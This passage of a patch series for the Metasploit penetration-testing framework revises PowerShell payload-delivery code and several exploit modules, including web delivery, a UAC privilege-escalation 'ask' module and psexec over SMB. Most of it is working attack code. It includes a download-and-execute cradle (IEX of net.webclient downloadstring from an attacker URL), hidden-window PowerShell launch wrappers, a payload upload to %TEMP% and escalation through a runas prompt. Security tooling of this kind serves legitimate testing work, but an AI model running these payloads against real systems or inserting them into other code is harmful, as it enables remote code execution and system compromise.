+        arg_string << "-Mta " if value
+      when :outputformat
+        arg_string << "-OutputFormat #{value} " if value
+      when :sta
+        arg_string << "-Sta " if value
+      when :noprofile
+        arg_string << "-NoProfile " if value
+      when :windowstyle
+        arg_string << "-WindowStyle #{value} " if  value
+      end
+    end
+
+    #Command must be last (unless from stdin - etc)
+    if opts[:command]
+      arg_string << "-Command #{opts[:command]}"
+    end
+
+    # Shorten args if PSH 2.0+
+    unless datastore['PSH::old_technique']
+      arg_string.gsub!('-Command', '-c')
+      arg_string.gsub!('-EncodedCommand', '-e')
+      arg_string.gsub!('-ExecutionPolicy', '-ep')
+      arg_string.gsub!('-File', '-f')
+      arg_string.gsub!('-InputFormat', '-i')
+      arg_string.gsub!('-NoExit', '-noe')
+      arg_string.gsub!('-NoLogo', '-nol')
+      arg_string.gsub!('-NoProfile', '-nop')
+      arg_string.gsub!('-NonInteractive', '-noni')
+      arg_string.gsub!('-OutputFormat', '-o')
+      arg_string.gsub!('-Sta', '-s')
+      arg_string.gsub!('-WindowStyle', '-w')
+    end
+
+    return arg_string
+  end
   #
   # Runs powershell in hidden window raising interactive proc msg
   #
   def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = "-w hidden -nop -e #{ps_code}"
+    arg_opts = {
+        :noprofile => true,
+        :windowstyle => 'hidden',
+        :encodedcommand => ps_code
+    }
+
+    # Old technique fails if powershell exits..
+    arg_opts[:noexit] = true if datastore['PSH::old_technique']
+
+    ps_args = generate_psh_args(arg_opts)
 
     ps_wrapper = <<EOS
 $si=New-Object System.Diagnostics.ProcessStartInfo
@@ -113,7 +192,7 @@ EOS
   #
   # Creates cmd script to execute psh payload
   #
-  def cmd_psh_payload(pay, old_psh=datastore['PSH::old_method'], wow64=datastore['PSH::run_wow64'])
+  def cmd_psh_payload(pay, old_psh=datastore['PSH::old_technique'], wow64=datastore['PSH::run_wow64'])
     # Allow powershell 1.0 format
     if old_psh
       psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
@@ -131,7 +210,6 @@ EOS
     # Determine appropriate architecture, manual method reduces script size
 		ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
 
-
     compressed = compress_script(psh_payload)
     encoded = encode_script(psh_payload)
 
@@ -145,7 +223,12 @@ EOS
     final_payload = run_hidden_psh(smallest_payload,ps_bin)
 
     # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{final_payload}\r\n"
+    psh_command = generate_psh_command_line({
+                                    :noprofile => true,
+                                    :windowstyle => 'hidden',
+                                    :command => final_payload
+                                })
+    command = "%COMSPEC% /B /C start /min #{psh_command}\r\n"
   end
 
 
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 3514de3589..100d83fb3a 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -6,11 +6,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -58,7 +60,11 @@ class Metasploit3 < Msf::Exploit::Remote
     url = get_uri()
     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
     print_status("Run the following command on the target machine:")
-    print_line("powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}")
+    print_line generate_psh_command_line({
+                                     :noprofile => true,
+                                     :windowstyle => 'hidden',
+                                     :command => download_and_run
+                                 })
   end
 end
 

From a5dc75a82e8fda4e499ce4f5d3250d9b285807aa Mon Sep 17 00:00:00 2001
From: b00stfr3ak <goduke44@gmail.com>
Date: Sat, 19 Oct 2013 00:15:38 -0700
Subject: [PATCH 021/321] Added PSH option to windows/local/ask exploit

Gives you the ability to use powershell to 'ask' for admin rights if the
user has them.  Using powershell makes the pop up blue instead of orange
and states that the company is Microsoft, it also doesn't drop an exe
on the system.  Looks like 32 bit https works but if you migrate out you
loose priv and if you run cachedump the session hangs.
---
 modules/exploits/windows/local/ask.rb | 67 +++++++++++++++++----------
 1 file changed, 42 insertions(+), 25 deletions(-)

diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
index 9e2b996c3c..163f62edde 100644
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -7,12 +7,14 @@
 
 require 'msf/core'
 require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Exploit::EXE
   include Post::File
+  include Exploit::Powershell
 
   def initialize(info={})
     super( update_info( info,
@@ -23,7 +25,10 @@ class Metasploit3 < Msf::Exploit::Local
         UAC settings.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'mubix' ],
+      'Author'        => [
+          'mubix', # Original technique
+          'b00stfr3ak' # Added powershell option
+      ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
@@ -31,13 +36,14 @@ class Metasploit3 < Msf::Exploit::Local
       'References'    => [
         [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
       ],
-      'DisclosureDate'=> "Jan 3 2012"
+      'DisclosureDate'=> "Jan 3 2012",
     ))
 
     register_options([
       OptString.new("FILENAME", [ false, "File name on disk"]),
       OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
-      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
+      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
     ])
 
   end
@@ -71,31 +77,42 @@ class Metasploit3 < Msf::Exploit::Local
     #
     # Generate payload and random names for upload
     #
-    payload = generate_payload_exe
 
-    if datastore["FILENAME"]
-      payload_filename = datastore["FILENAME"]
+    if datastore["TECHNIQUE"] == "EXE"
+      if datastore["UPLOAD"]
+        exe_payload = generate_exe_payload_exe
+
+        if datastore["FILENAME"]
+          payload_filename = datastore["FILENAME"]
+        else
+          payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+        end
+
+        if datastore["PATH"]
+          payload_path = datastore["PATH"]
+        else
+          payload_path = session.fs.file.expand_path("%TEMP%")
+        end
+
+        cmd_location = "#{payload_path}\\#{payload_filename}"
+
+        if datastore["UPLOAD"]
+          print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+          fd = session.fs.file.new(cmd_location, "wb")
+          fd.write(exe_payload)
+          fd.close
+        end
+
+        session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
+      else
+        print_error("No Upload Path!")
+        return
+      end
     else
-      payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+      command = cmd_psh_payload(payload.encoded)
+      arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
+      session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
     end
-
-    if datastore["PATH"]
-      payload_path = datastore["PATH"]
-    else
-      payload_path = session.fs.file.expand_path("%TEMP%")
-    end
-
-    cmd_location = "#{payload_path}\\#{payload_filename}"
-
-    if datastore["UPLOAD"]
-      print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
-      fd = session.fs.file.new(cmd_location, "wb")
-      fd.write(payload)
-      fd.close
-    end
-
-    session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
-
   end
 end
 

From 6881774c0305f12129b8b948107f6683fe721568 Mon Sep 17 00:00:00 2001
From: b00stfr3ak <goduke44@gmail.com>
Date: Sun, 20 Oct 2013 01:15:51 -0700
Subject: [PATCH 022/321] Updated with comments from jlee-r7 and Meatballs1

Added fail_with instead of just print_error
figured a way to execute the cmd_psh_payload with out using gsub
added case statment for datastore['TECHNIQUE']
---
 modules/exploits/windows/local/ask.rb | 69 ++++++++++-----------------
 1 file changed, 25 insertions(+), 44 deletions(-)

diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
index 163f62edde..2fbc6cc300 100644
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -42,14 +42,13 @@ class Metasploit3 < Msf::Exploit::Local
     register_options([
       OptString.new("FILENAME", [ false, "File name on disk"]),
       OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
-      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
+      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
       OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
     ])
 
   end
 
   def exploit
-
     root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
     open_key = session.sys.registry.open_key(root_key, base_key)
     lua_setting = open_key.query_value('EnableLUA')
@@ -63,56 +62,38 @@ class Metasploit3 < Msf::Exploit::Local
     uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
 
     case uac_level.data
-    when 2
-      print_status "UAC is set to 'Always Notify'"
-      print_status "The user will be prompted, wait for them to click 'Ok'"
-    when 5
-      print_debug "UAC is set to Default"
-      print_debug "The user will be prompted, wait for them to click 'Ok'"
-    when 0
-      print_good "UAC is not enabled, no prompt for the user"
+      when 2
+        print_status "UAC is set to 'Always Notify'"
+        print_status "The user will be prompted, wait for them to click 'Ok'"
+      when 5
+        print_debug "UAC is set to Default"
+        print_debug "The user will be prompted, wait for them to click 'Ok'"
+      when 0
+        print_good "UAC is not enabled, no prompt for the user"
     end
 
-
     #
     # Generate payload and random names for upload
     #
-
-    if datastore["TECHNIQUE"] == "EXE"
-      if datastore["UPLOAD"]
-        exe_payload = generate_exe_payload_exe
-
-        if datastore["FILENAME"]
-          payload_filename = datastore["FILENAME"]
-        else
-          payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-        end
-
-        if datastore["PATH"]
-          payload_path = datastore["PATH"]
-        else
-          payload_path = session.fs.file.expand_path("%TEMP%")
-        end
-
+    case datastore["TECHNIQUE"]
+      when "EXE"
+        exe_payload = generate_payload_exe
+        payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+        payload_path = datastore["PATH"] || expand_path("%TEMP%")
         cmd_location = "#{payload_path}\\#{payload_filename}"
-
         if datastore["UPLOAD"]
           print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
-          fd = session.fs.file.new(cmd_location, "wb")
-          fd.write(exe_payload)
-          fd.close
+          write_file(cmd_location, exe_payload)
+        else
+          #print_error("No Upload Path!")
+          fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
+          return
         end
-
-        session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
-      else
-        print_error("No Upload Path!")
-        return
-      end
-    else
-      command = cmd_psh_payload(payload.encoded)
-      arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
-      session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
+        command, args = cmd_location,nil
+        session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
+      when "PSH"
+        command, args = "cmd.exe",  " /c #{cmd_psh_payload(payload.encoded)}"
     end
+    session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
   end
-end
-
+end
\ No newline at end of file

From 9695b2d66283bdff7f68ad4ab37ecbde0e494e2a Mon Sep 17 00:00:00 2001
From: b00stfr3ak <goduke44@gmail.com>
Date: Mon, 21 Oct 2013 11:57:50 -0700
Subject: [PATCH 023/321] Added check method

The method checks to see if the user is a part of the admin group.  If
the user is the exploit continues, if not the exploit stops because it
will prompt the user for a password instead of just clicking ok.
---
 modules/exploits/windows/local/ask.rb | 29 +++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)

diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
index 2fbc6cc300..ab8c24bb16 100644
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -48,7 +48,36 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
+  def check
+    session.readline
+    print_status('Checking admin status...')
+    whoami = session.sys.process.execute('cmd /c whoami /groups',
+                                         nil,
+                                         {'Hidden' => true, 'Channelized' => true}
+    )
+    cmdout = []
+    while(cmdoutput = whoami.channel.read)
+      cmdout << cmdoutput
+    end
+    if cmdout.size == 0
+      fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute")
+    else
+      isinadmins = cmdout.join.scan(/S-1-5-32-544/)
+      if isinadmins.size > 0
+        print_good('Part of Administrators group! Continuing...')
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_error('Not in admins group, cannot escalate with this module')
+        print_error('Exiting...')
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
   def exploit
+    admin_check = check
+    if admin_check.join =~ /safe/
+      return Exploit::CheckCode::Safe
+    end
     root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
     open_key = session.sys.registry.open_key(root_key, base_key)
     lua_setting = open_key.query_value('EnableLUA')

From 4fc8bb2b4bdef4d702b4018f54345a2e043a6630 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 22 Oct 2013 00:42:59 +0100
Subject: [PATCH 024/321] Auto arch detection

---
 lib/msf/core/exploit/powershell.rb         | 47 +++++++++++++++-------
 modules/exploits/windows/smb/psexec_psh.rb |  8 +---
 2 files changed, 35 insertions(+), 20 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index a9c95f1fb3..2ed96c9726 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -13,11 +13,6 @@ module Exploit::Powershell
       [
         OptBool.new('PSH::persist', [true, 'Run the payload in a loop', false]),
         OptBool.new('PSH::old_technique', [true, 'Use powershell 1.0', false]),
-        OptBool.new('PSH::run_wow64', [
-          false,
-          'Execute powershell in 32bit compatibility mode, payloads need x86 arch',
-          false
-            ]),
         OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
         OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
         OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
@@ -162,8 +157,9 @@ module Exploit::Powershell
   end
   #
   # Runs powershell in hidden window raising interactive proc msg
+  # Detect the architecture
   #
-  def run_hidden_psh(ps_code,ps_bin='powershell.exe')
+  def run_hidden_psh(ps_code,payload_arch)
     arg_opts = {
         :noprofile => true,
         :windowstyle => 'hidden',
@@ -175,9 +171,9 @@ module Exploit::Powershell
 
     ps_args = generate_psh_args(arg_opts)
 
-    ps_wrapper = <<EOS
+    process_start_info = <<EOS
 $si=New-Object System.Diagnostics.ProcessStartInfo
-$si.FileName=#{ps_bin}
+$si.FileName=$ps_bin
 $si.Arguments='#{ps_args}'
 $si.UseShellExecute=$false
 $si.RedirectStandardOutput=$true
@@ -185,14 +181,35 @@ $si.WindowStyle='Hidden'
 $si.CreateNoWindow=$true
 $p=[System.Diagnostics.Process]::Start($si)
 EOS
+    process_start_info.gsub!("\n",';')
 
-    return ps_wrapper.gsub("\n",';')
+    archictecure_detection = <<EOS
+$p_arch='#{payload_arch}';
+$ps_bin='powershell.exe';
+if ([IntPtr]::Size -eq 4) {
+  if ($p_arch -eq 'x86') {
+    $ps_bin='powershell.exe'
+  } else {
+    $ps_bin==$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'
+  }
+} else {
+  if ($p_arch -eq 'x86') {
+    $ps_bin=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
+  } else {
+    $ps_bin='powershell.exe'
+  }
+};
+EOS
+    archictecure_detection.gsub!("\n","")
+    archictecure_detection.gsub!("\s\s","")
+
+    return (archictecure_detection + process_start_info)
   end
 
   #
   # Creates cmd script to execute psh payload
   #
-  def cmd_psh_payload(pay, old_psh=datastore['PSH::old_technique'], wow64=datastore['PSH::run_wow64'])
+  def cmd_psh_payload(pay, payload_arch, old_psh=datastore['PSH::old_technique'])
     # Allow powershell 1.0 format
     if old_psh
       psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
@@ -207,8 +224,6 @@ EOS
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
-    # Determine appropriate architecture, manual method reduces script size
-		ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
 
     compressed = compress_script(psh_payload)
     encoded = encode_script(psh_payload)
@@ -219,8 +234,10 @@ EOS
       smallest_payload = compressed
     end
 
-    # Wrap in hidden runtime
-    final_payload = run_hidden_psh(smallest_payload,ps_bin)
+    # Wrap in hidden runtime / architecture detection
+    final_payload = run_hidden_psh(smallest_payload, payload_arch)
+
+    #final_payload = encode_script(hidden_payload)
 
     # Convert to base64 for -encodedcommand execution
     psh_command = generate_psh_command_line({
@@ -229,6 +246,8 @@ EOS
                                     :command => final_payload
                                 })
     command = "%COMSPEC% /B /C start /min #{psh_command}\r\n"
+    vprint_status("Command length: #{command.length}")
+    return command
   end
 
 
diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index e2399ecbbf..2dcc1ef346 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -68,9 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		command = cmd_psh_payload(payload.encoded)
+		command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
 		if datastore['DryRun']
-			print_good command
+			print_good command.inspect
 			return
 		end
 
@@ -78,10 +78,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
 		end
 
-		if datastore['PSH::run_wow64'] and target_arch.first == "x86_64"
-			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with PSH::run_wow64 enabled")
-		end
-
 		# Try and authenticate with given credentials
 		if connect
 			begin

From 868b70c9edd74aec28e8193d310fbe981ac91c55 Mon Sep 17 00:00:00 2001
From: b00stfr3ak <goduke44@gmail.com>
Date: Fri, 25 Oct 2013 14:05:33 -0700
Subject: [PATCH 025/321] Added priv lib and runas lib

Cleaned up code with using the new lib files
---
 modules/exploits/windows/local/ask.rb | 79 ++++++++-------------------
 1 file changed, 24 insertions(+), 55 deletions(-)

diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
index ab8c24bb16..6f9f79e06d 100644
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -6,15 +6,12 @@
 ##
 
 require 'msf/core'
-require 'msf/core/exploit/exe'
-require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
-  include Exploit::EXE
-  include Post::File
-  include Exploit::Powershell
+  include Post::Windows::Priv
+  include Post::Windows::Runas
 
   def initialize(info={})
     super( update_info( info,
@@ -51,78 +48,50 @@ class Metasploit3 < Msf::Exploit::Local
   def check
     session.readline
     print_status('Checking admin status...')
-    whoami = session.sys.process.execute('cmd /c whoami /groups',
-                                         nil,
-                                         {'Hidden' => true, 'Channelized' => true}
-    )
-    cmdout = []
-    while(cmdoutput = whoami.channel.read)
-      cmdout << cmdoutput
-    end
-    if cmdout.size == 0
-      fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute")
+    admin_group = is_in_admin_group?
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+      return Exploit::CheckCode::Unknown
     else
-      isinadmins = cmdout.join.scan(/S-1-5-32-544/)
-      if isinadmins.size > 0
+      if admin_group
         print_good('Part of Administrators group! Continuing...')
         return Exploit::CheckCode::Vulnerable
       else
-        print_error('Not in admins group, cannot escalate with this module')
-        print_error('Exiting...')
+        print_error("Not in admins group, cannot escalate with this module")
         return Exploit::CheckCode::Safe
       end
     end
   end
+
   def exploit
     admin_check = check
     if admin_check.join =~ /safe/
-      return Exploit::CheckCode::Safe
+      fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
     end
-    root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
-    open_key = session.sys.registry.open_key(root_key, base_key)
-    lua_setting = open_key.query_value('EnableLUA')
-
-    if lua_setting.data == 1
+    if is_uac_enabled?
       print_status "UAC is Enabled, checking level..."
     else
-      print_good "UAC is not enabled, no prompt for the user"
+      if is_in_admin_group?
+        fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
+      else
+        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+      end
     end
-
-    uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
-
-    case uac_level.data
-      when 2
-        print_status "UAC is set to 'Always Notify'"
-        print_status "The user will be prompted, wait for them to click 'Ok'"
-      when 5
-        print_debug "UAC is set to Default"
-        print_debug "The user will be prompted, wait for them to click 'Ok'"
-      when 0
+    case get_uac_level
+      when UAC_NO_PROMPT
         print_good "UAC is not enabled, no prompt for the user"
+      else
+        print_status "The user will be prompted, wait for them to click 'Ok'"
     end
-
     #
     # Generate payload and random names for upload
     #
     case datastore["TECHNIQUE"]
       when "EXE"
-        exe_payload = generate_payload_exe
-        payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-        payload_path = datastore["PATH"] || expand_path("%TEMP%")
-        cmd_location = "#{payload_path}\\#{payload_filename}"
-        if datastore["UPLOAD"]
-          print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
-          write_file(cmd_location, exe_payload)
-        else
-          #print_error("No Upload Path!")
-          fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
-          return
-        end
-        command, args = cmd_location,nil
-        session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
+        execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
       when "PSH"
-        command, args = "cmd.exe",  " /c #{cmd_psh_payload(payload.encoded)}"
+        execute_psh
     end
-    session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
   end
-end
\ No newline at end of file
+end

From 3cbf768d16cabb177caefbdf438d5df738086bc2 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 22 Nov 2013 22:58:42 +0000
Subject: [PATCH 026/321] Small size reductions

---
 lib/msf/core/exploit/powershell.rb | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 2ed96c9726..5b524bd991 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -171,6 +171,12 @@ module Exploit::Powershell
 
     ps_args = generate_psh_args(arg_opts)
 
+    if payload_arch ==  'x86'
+      arch_x86 = '$True'
+    else
+      arch_x86 = '$False'
+    end
+
     process_start_info = <<EOS
 $si=New-Object System.Diagnostics.ProcessStartInfo
 $si.FileName=$ps_bin
@@ -184,16 +190,15 @@ EOS
     process_start_info.gsub!("\n",';')
 
     archictecure_detection = <<EOS
-$p_arch='#{payload_arch}';
-$ps_bin='powershell.exe';
+$x86=#{arch_x86};
 if ([IntPtr]::Size -eq 4) {
-  if ($p_arch -eq 'x86') {
+  if ($x86) {
     $ps_bin='powershell.exe'
   } else {
     $ps_bin==$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'
   }
 } else {
-  if ($p_arch -eq 'x86') {
+  if ($x86) {
     $ps_bin=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
   } else {
     $ps_bin='powershell.exe'

From c5007f67ab864c17034c118f886275826a8e723b Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 22 Nov 2013 23:00:36 +0000
Subject: [PATCH 027/321] Retab psexec_psh

---
 modules/exploits/windows/smb/psexec_psh.rb | 102 ++++++++++-----------
 1 file changed, 51 insertions(+), 51 deletions(-)

diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index 76698891bf..546b41dbf2 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -36,64 +36,64 @@ class Metasploit3 < Msf::Exploit::Remote
         'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
         'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
       ],
-			'License'        => MSF_LICENSE,
-			'Privileged'     => true,
-			'DefaultOptions' =>
-				{
-					'WfsDelay'     => 10,
-					'EXITFUNC' => 'thread'
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-					[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
-				],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Jan 01 1999',
-			'References'     => [
-				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
-				[ 'OSVDB', '3106'],
-				[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
-				[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
-				[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
-			]
-		))
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'WfsDelay'     => 10,
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 01 1999',
+      'References'     => [
+        [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+        [ 'OSVDB', '3106'],
+        [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
+        [ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
+        [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
+      ]
+    ))
 
-		register_options([
-			OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]),
-		], self.class)
-	end
+    register_options([
+      OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]),
+    ], self.class)
+  end
 
-	def exploit
-		command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
-		if datastore['DryRun']
-			print_good command.inspect
-			return
-		end
+  def exploit
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    if datastore['DryRun']
+      print_good command.inspect
+      return
+    end
 
-		if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
-			print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
-		end
+    if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+    end
 
-		# Try and authenticate with given credentials
-		if connect
-			begin
-				smb_login
-			rescue StandardError => autherror
-				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
-			end
-			# Execute the powershell command
-			print_status("#{peer} - Executing the payload...")
-			begin
-				return psexec(command)
-			rescue StandardError => exec_command_error
-				fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+    # Try and authenticate with given credentials
+    if connect
+      begin
+        smb_login
+      rescue StandardError => autherror
+        fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
+      end
+      # Execute the powershell command
+      print_status("#{peer} - Executing the payload...")
+      begin
+        return psexec(command)
+      rescue StandardError => exec_command_error
+        fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
       ensure
         disconnect
       end
-		end
-	end
+    end
+  end
 
   def peer
     return "#{rhost}:#{rport}"

From 9835649858c702f50699df29a436019260a48fe6 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 22 Nov 2013 23:04:44 +0000
Subject: [PATCH 028/321] Update hwnd_broadcast to use generated powershell
 command line.

---
 modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
index 92f2e46e3c..765a73f51c 100644
--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -171,7 +171,11 @@ class Metasploit3 < Msf::Exploit::Local
   def primer
     url = get_uri()
